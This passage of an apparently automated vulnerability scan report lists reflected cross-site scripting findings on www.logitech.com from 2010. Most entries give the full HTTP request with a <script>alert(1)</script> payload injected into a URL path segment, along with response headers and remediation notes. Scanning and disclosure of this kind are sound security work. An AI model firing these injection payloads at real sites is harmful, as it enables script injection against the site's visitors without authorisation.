This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/keyboards842f0"><script>alert(1)</script>c85bc793110/keyboard/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ec30</script><script>alert(1)</script>0183a783f82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboards6ec30</script><script>alert(1)</script>0183a783f82/keyboard/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cda5a"><script>alert(1)</script>ff3ecd78363 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/keyboards/keyboardcda5a"><script>alert(1)</script>ff3ecd78363/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cf6a</script><script>alert(1)</script>ecc50b3600f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboards/keyboard4cf6a</script><script>alert(1)</script>ecc50b3600f/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3cd0</script><script>alert(1)</script>477ae98b69a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboards/keyboard/devicese3cd0</script><script>alert(1)</script>477ae98b69a/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aace3"><script>alert(1)</script>367ace30f3f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/keyboards/keyboard/devicesaace3"><script>alert(1)</script>367ace30f3f/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb14"%3b2ba7d046cfe was submitted in the REST URL parameter 1. This input was echoed as feb14";2ba7d046cfe in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usfeb14"%3b2ba7d046cfe/keyboards/keyboard/devices/7288 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8ab7</script><script>alert(1)</script>db394a28dbc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /e8ab7</script><script>alert(1)</script>db394a28dbc/keyboards/keyboard/devices/7288 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 897fd"><script>alert(1)</script>ca08766b852 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us897fd"><script>alert(1)</script>ca08766b852/keyboards/keyboard/devices/7288 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52c9e"><script>alert(1)</script>4c31df12660 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/keyboards52c9e"><script>alert(1)</script>4c31df12660/keyboard/devices/7288 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e06c1</script><script>alert(1)</script>ea432670ffa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboardse06c1</script><script>alert(1)</script>ea432670ffa/keyboard/devices/7288 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2e07"><script>alert(1)</script>f1fec35d72c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/keyboards/keyboardc2e07"><script>alert(1)</script>f1fec35d72c/devices/7288 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1ff4</script><script>alert(1)</script>e771cb94947 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboards/keyboardb1ff4</script><script>alert(1)</script>e771cb94947/devices/7288 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95a28</script><script>alert(1)</script>2b45d2ceb1c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboards/keyboard/devices95a28</script><script>alert(1)</script>2b45d2ceb1c/7288 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 769ac"><script>alert(1)</script>36fb4438e1a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/keyboards/keyboard/devices769ac"><script>alert(1)</script>36fb4438e1a/7288 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8846"><script>alert(1)</script>89067951f7f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/keyboards/keyboard/devices/7288e8846"><script>alert(1)</script>89067951f7f HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc23a</script><script>alert(1)</script>ef8191f3142 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboards/keyboard/devices/7288bc23a</script><script>alert(1)</script>ef8191f3142 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1524a"><script>alert(1)</script>d0a8213d2a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us1524a"><script>alert(1)</script>d0a8213d2a6/keyboards/keyboard/devices/k750-keyboard HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f7db</script><script>alert(1)</script>56767b218db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /6f7db</script><script>alert(1)</script>56767b218db/keyboards/keyboard/devices/k750-keyboard HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22cc2"%3b5722630f262 was submitted in the REST URL parameter 1. This input was echoed as 22cc2";5722630f262 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us22cc2"%3b5722630f262/keyboards/keyboard/devices/k750-keyboard HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d386c"><script>alert(1)</script>634022e77ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/keyboardsd386c"><script>alert(1)</script>634022e77ee/keyboard/devices/k750-keyboard HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1680</script><script>alert(1)</script>c0d87968b95 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboardsb1680</script><script>alert(1)</script>c0d87968b95/keyboard/devices/k750-keyboard HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b503"><script>alert(1)</script>787d3bfd251 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/keyboards/keyboard3b503"><script>alert(1)</script>787d3bfd251/devices/k750-keyboard HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28d00</script><script>alert(1)</script>dabb667aa01 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboards/keyboard28d00</script><script>alert(1)</script>dabb667aa01/devices/k750-keyboard HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e215"><script>alert(1)</script>113029ae1bf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/keyboards/keyboard/devices7e215"><script>alert(1)</script>113029ae1bf/k750-keyboard HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4207</script><script>alert(1)</script>a0bba87674b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboards/keyboard/devicesd4207</script><script>alert(1)</script>a0bba87674b/k750-keyboard HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cd04"><script>alert(1)</script>08976b84846 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/keyboards/keyboard/devices/k750-keyboard7cd04"><script>alert(1)</script>08976b84846 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2d6c</script><script>alert(1)</script>c962272d327 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboards/keyboard/devices/k750-keyboardb2d6c</script><script>alert(1)</script>c962272d327 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
